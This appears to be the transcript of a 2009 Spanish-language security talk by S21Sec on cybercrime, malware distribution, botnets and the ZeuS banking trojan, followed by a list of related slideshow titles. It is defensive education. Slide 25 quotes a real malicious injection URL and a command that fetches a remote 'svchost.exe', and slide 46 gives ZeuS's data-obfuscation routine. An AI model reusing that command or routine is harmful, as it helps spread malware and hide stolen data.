Cibercrimen Fraude Y Malware Mikel Gastesi

61
*[ CIBERCRIMEN: FRAUDE Y MALWARE ] Autor: Mikel Gastesi Urroz [email protected] Fecha: 10-07-2009

description

Charla impartida por Mikel Gastesi, de S21Sec, en el curso de Verano de la Universidad de Salamanca 2009.

Transcript of Cibercrimen Fraude Y Malware Mikel Gastesi

Page 1: Cibercrimen Fraude Y Malware Mikel Gastesi

*[ CIBERCRIMEN: FRAUDE Y MALWARE ]

Autor: Mikel Gastesi [email protected]

Fecha: 10-07-2009

Page 2: Cibercrimen Fraude Y Malware Mikel Gastesi

Confidencialidad

La información facilitada en este documento es propiedad de S21sec, quedando terminantemente prohibida la modificación o explotación de la totalidad o parte de los contenidos del presente documento, sin el consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no contestación a la correspondiente solicitud pueda ser entendida como autorización presunta para su utilización.

Pág. 2

Page 3: Cibercrimen Fraude Y Malware Mikel Gastesi

Índice

Pág. 3

Introducción - ¿Cibercrimen?EvoluciónDistribuciónInfecciónBotnets• ZeuS/Zbot

Money, money, money

Page 4: Cibercrimen Fraude Y Malware Mikel Gastesi

INTRODUCCIÓN - ¿CIBERCRIMEN?

Pág. 4

Page 5: Cibercrimen Fraude Y Malware Mikel Gastesi

¿CIBERCRIMEN?

Page 6: Cibercrimen Fraude Y Malware Mikel Gastesi

EVOLUCIÓN (de la mentalidad)

Page 7: Cibercrimen Fraude Y Malware Mikel Gastesi

EVOLUCION

1 persona• Ataques dirigidos• Recursos limitados

Grupos profesionales• Ataques indiscriminados/masivos• Muchos recursos técnicos

Page 8: Cibercrimen Fraude Y Malware Mikel Gastesi

EVOLUCIÓN

Cambio de objetivos

Inicios: Ataques al servidor• Necesidad de pocos recursos• Mayor conciencia de seguridad

Ahora: Ataque a los clientes• Necesidad de manejar mucha

información• Necesidad de una infraestructura

tecnológica• Poca conciencia de seguridad

Page 9: Cibercrimen Fraude Y Malware Mikel Gastesi

EVOLUCIÓN

1 servidor• Búsqueda de vulnerabilidades• Atacante trata de acceder al servidor

N clientes• Vulnerabilidades conocidas• Victima accede al vector de infección• ¿Phishing? → Malware!!!

Page 10: Cibercrimen Fraude Y Malware Mikel Gastesi

DISTRIBUCIÓN

Page 11: Cibercrimen Fraude Y Malware Mikel Gastesi

DISTRIBUCIÓN

El malware acude a la víctima• SPAM

• Búsqueda y robo de contactos• P2P• Ingeniería social• Descargas con “regalo”

Page 12: Cibercrimen Fraude Y Malware Mikel Gastesi

EJ. SPAM

Page 13: Cibercrimen Fraude Y Malware Mikel Gastesi

EJ. SPAM

Page 14: Cibercrimen Fraude Y Malware Mikel Gastesi

DISTRIBUCIÓN

La víctima acude al malware• Páginas fraudulentas

• Falsos antivirus• Falsas páginas de vídeos

• Páginas comprometidas• Páginas legítimas atacas

indiscriminadamente

Page 15: Cibercrimen Fraude Y Malware Mikel Gastesi

EJ. FAKE AV

Page 16: Cibercrimen Fraude Y Malware Mikel Gastesi

EJ. FAKE AV

Page 17: Cibercrimen Fraude Y Malware Mikel Gastesi

DISTRIBUCIÓN

Página comprometida, ¿cómo?• Nine ball: 40000 páginas

comprometidas• Cuentas FTP• Diccionario/Brute force• SQL injection• RFI• Exploits recientes, 0-days

Page 18: Cibercrimen Fraude Y Malware Mikel Gastesi

SQL INJECTION MASIVO

Page 19: Cibercrimen Fraude Y Malware Mikel Gastesi

INFECCIÓN

Page 20: Cibercrimen Fraude Y Malware Mikel Gastesi

INFECCIÓN

Page 21: Cibercrimen Fraude Y Malware Mikel Gastesi

INFECCIÓN

Software vulnerable• Sistema Operativo• Navegador• Complementos

• Flash• PDF...

TODO programa que interactúe con el exterior es una POSIBLE víctima.

Page 22: Cibercrimen Fraude Y Malware Mikel Gastesi

UNAS ESTADÍSTICAS... [secunia]

Page 23: Cibercrimen Fraude Y Malware Mikel Gastesi

INFECCIÓN

Page 24: Cibercrimen Fraude Y Malware Mikel Gastesi

INFECCIÓN

Víctima “vulnerable”• Ejecución de ficheros adjuntos• Doble extensión (.doc______.exe)

Confianza en la página• Codecs

No siempre se está a salvo teniendo todo el software actualizado• 0-days• Ventana de tiempo de los antivirus

Page 25: Cibercrimen Fraude Y Malware Mikel Gastesi

INFECCIÓN

Microsoft DirectShow 0-day (msvidctl.dll)

• Páginas comprometidas

• Inyecta 8oy4t.8866.org/aa/go.jpg

• Muchos exploits, entre ellos el 0day

• 2000, 2003 y XP vulnerables

• Ejecuta: C:\[%programfiles%]\Internet Explorer\iexplore.exe "http://milllk.com/wm/svchost.exe"

• Detectado por solamente por 2 AV (VirusTotal)

• Por ahora, v0.1http://www.securityfocus.com/bid/35558http://www.csis.dk/en/news/news.asp?tekstID=799http://www.microsoft.com/technet/security/advisory/972890.mspx

Page 26: Cibercrimen Fraude Y Malware Mikel Gastesi

INFECCIÓN

La cadena es tan fuerte como el eslabón más débil

Page 27: Cibercrimen Fraude Y Malware Mikel Gastesi

BOTNETS

Page 28: Cibercrimen Fraude Y Malware Mikel Gastesi

BOTNETS

Page 29: Cibercrimen Fraude Y Malware Mikel Gastesi

BOTNETS

Page 30: Cibercrimen Fraude Y Malware Mikel Gastesi

BOTNETS

Uso:• Proxy• Ataques DdoS• Obtención de credenciales• Hosting• SPAM• Supercomputadora• ...

Page 31: Cibercrimen Fraude Y Malware Mikel Gastesi

BOTNETS

No solo PCsBotnets ocultas tras Bullet-proof ISP• No responden a avisos de abuso• Alojan paneles de control• Alojan vectores de infección y

malware• Fraudulento

Page 32: Cibercrimen Fraude Y Malware Mikel Gastesi

TROYANOS BANCARIOS - ZeuS

Page 33: Cibercrimen Fraude Y Malware Mikel Gastesi

TROYANOS BANCARIOS

SilenciososDistribución masivaBotnetRobar credencialesMitB¿Por qué no más? ¡Es gratis!• Control de la máquina• Proxy• …

Programado por humanos• Parámetros• Idioma, user-agent...

Page 34: Cibercrimen Fraude Y Malware Mikel Gastesi

TROYANOS BANCARIOS

Actores• Sinowal

• Torpig• Buena ocultación• Generación de dominios mediante

algoritmo• Arrestos

• BankPatch• MitB

• ZeuS• Más sencillo• Ocultación user-mode• ¡El rey del mambo!

Page 35: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

Finales 2006

• Simple bot

• ~3000$Principios 2007

• Se hace popular

• ~700$Finales 2007

• Versiones personalizadasMediados 2008

• Vulnerabilidades

• Implementaciones en paralelo2009

• Vulnerabilidades corregidas

• Soporta parcialmente IPv6...

Page 36: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS – CAMBIOS IMPORTANTES

Corrección de bugs• Mal saneamiento de parámetros

• Escritura de ficheros• ¡Guerra!

10-12-2008 → RC4• Local data requests to the server

and the configuration file can be encrypted with RC4 key depending on your choice

Page 37: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

Page 38: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

Distribución• SPAM

• Facturas• E-cards• Michael Jackson

• Kits de exploits

Page 39: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS - CARACTERÍSTICAS

BotActualización configuraciónActualización del binario/etc/hostsSocks proxyInyección HTMLRedirección HTMLCapturas de pantallaCapturas de teclados virtualesCaptura de credencialesRobo certificadosKillOS

Page 40: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS - TODO

Compatibility with Windows Vista and Windows 7Improved WinAPI hookingRandom generation of configuration files to avoid generic detectionConsole-based builderVersion supporing 64 bit processorsFull IPv6 supportDetailed statistics on antivirus software and firewalls installed on the infected machines

Page 41: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

Page 42: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS - FICHEROS

1.0.x.x

• ntos.exe

• \wnspoem\audio.dll

• \wnspoem\video.dll……1.2.x.x

• sdra64.exe

• \lowsec\local.ds

• \lowsec\audio.ds¿1.3.x.x?

• bootwindows.exe

• \skype32\win32post.dll

• \skype32\win64post.dll

Page 43: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

Page 44: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

Page 45: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

Config file:• Cifrado con RC4• Update binary• Url C&C server• Advanced configuration• Webfilters• WebFakes• WebInjects

Page 46: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

Ficheros de datos• Cifrado RC4 al servidor• Cifrado.

For i = 1 to Length(Data) If (i % 2) == 0 Data[i] -= 7 + i * 2 Else Data[i] += 10 + i * 2

Page 47: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS - C&C

Page 48: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS - C&C

Instalación: • Siguiente → Siguiente → Final

PHP + mysql • O ficheros

Generador de ficheros de configuración y binarios.Opciones del panel de control

Page 49: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS - C&C

Instalación: • Siguiente → Siguiente → Final

PHP + mysql • O ficheros

Generador de ficheros de configuración y binarios.Opciones del panel de control

Page 50: Cibercrimen Fraude Y Malware Mikel Gastesi

Zeus – C&C

Opciones• Botnet : Bots online• Botnet : Comandos remotos• Logs : Búsqueda• Logs : Ficheros subidos• System : Perfil• System : Opciones

Page 51: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

Page 52: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

KillOS• HKEY_CURRENT_USER• HKEY_LOCAL_MACHINE\software• HKEL_LOCAL_MACHINE\system• Trata de llenar de ceros toda la

memoria.• BSOD

Page 53: Cibercrimen Fraude Y Malware Mikel Gastesi

ZEUS

KillOS• HKEY_CURRENT_USER• HKEY_LOCAL_MACHINE\software• HKEL_LOCAL_MACHINE\system• Trata de llenar de ceros toda la

memoria.• BSOD

Page 54: Cibercrimen Fraude Y Malware Mikel Gastesi

MONEY, MONEY, MONEY

Page 55: Cibercrimen Fraude Y Malware Mikel Gastesi

LUCRO

Crear malware y venderloCrear botnet y alquilarlaObtención de credenciales y venderlasObtención de dinero gracias a las credenciales

Page 56: Cibercrimen Fraude Y Malware Mikel Gastesi

LUCRO

Page 57: Cibercrimen Fraude Y Malware Mikel Gastesi

LUCRO

Page 58: Cibercrimen Fraude Y Malware Mikel Gastesi

LUCRO

Page 59: Cibercrimen Fraude Y Malware Mikel Gastesi

LUCRO

Page 60: Cibercrimen Fraude Y Malware Mikel Gastesi

LUCRO

TransferenciasCompra de bienes• Físicos• Virtuales

Subastas...deja volar tu imaginación

Page 61: Cibercrimen Fraude Y Malware Mikel Gastesi

*[ MUCHAS GRACIAS ]

Pág. 61


Software malware

Software malware

Cibercrimen - Instituto de Auditores Internos de Argentina€¦ · Cibercrimen Desafios Herramientas Legales Cooperacion Internacional Cooperacion Publico Privada. Cibercrimen Desafios

Cibercrimen - Instituto de Auditores Internos de Argentina€¦ · Cibercrimen Desafios Herramientas Legales Cooperacion Internacional Cooperacion Publico Privada. Cibercrimen Desafios

Malware jorge

Malware jorge

Virusy malware

Virusy malware

Lockdroid malware

Lockdroid malware

Diapositivas cibercrimen

Diapositivas cibercrimen

PLANTEAMIENTO DE BUENAS PRÁCTICAS PARA LA PREVENCION DEL CIBERCRIMEN Y ANALISIS DEL CIBERCRIMEN EN GUATEMALA

PLANTEAMIENTO DE BUENAS PRÁCTICAS PARA LA PREVENCION DEL CIBERCRIMEN Y ANALISIS DEL CIBERCRIMEN EN GUATEMALA

Cibercrimen en el peru

Cibercrimen en el peru

Cibercrimen diapositivas

Cibercrimen diapositivas

El malware

El malware

REDACCION - MALWARE

REDACCION - MALWARE

Discuri Malware

Discuri Malware

Cibercrimen point

Cibercrimen point

Trabajo Malware

Trabajo Malware

Del USB a la web: cómo tu sitio propaga malware...•Cibercrimen Casos reales y estadísticas 15 Análisis Malc0de y MDL •Brasil es el país con más reportes en Latinoamérica,

Del USB a la web: cómo tu sitio propaga malware...•Cibercrimen Casos reales y estadísticas 15 Análisis Malc0de y MDL •Brasil es el país con más reportes en Latinoamérica,

Malware, Malware y más Malware ¿Cómo me puedo proteger? “Dijo el cliente web”.

Malware, Malware y más Malware ¿Cómo me puedo proteger? “Dijo el cliente web”.

Malware y cibercrimen en Latinoamérica: ¿Té o Vodka? · del dia de hoy en ciudad de Guatemala, el incidente fue captado por un video aficionado que se encontraba por 10 alrededores

Malware y cibercrimen en Latinoamérica: ¿Té o Vodka? · del dia de hoy en ciudad de Guatemala, el incidente fue captado por un video aficionado que se encontraba por 10 alrededores

Malware Android

Malware Android

BernhardPOS Malware

BernhardPOS Malware

CIBERCRIMEN Y LOS FENOMENOS EMERGENTES JEFATURA NACIONAL DE DELITOS ECONÓMICOS BRIGADA INVESTIGADORA DEL CIBERCRIMEN METROPOLITANA.

CIBERCRIMEN Y LOS FENOMENOS EMERGENTES JEFATURA NACIONAL DE DELITOS ECONÓMICOS BRIGADA INVESTIGADORA DEL CIBERCRIMEN METROPOLITANA.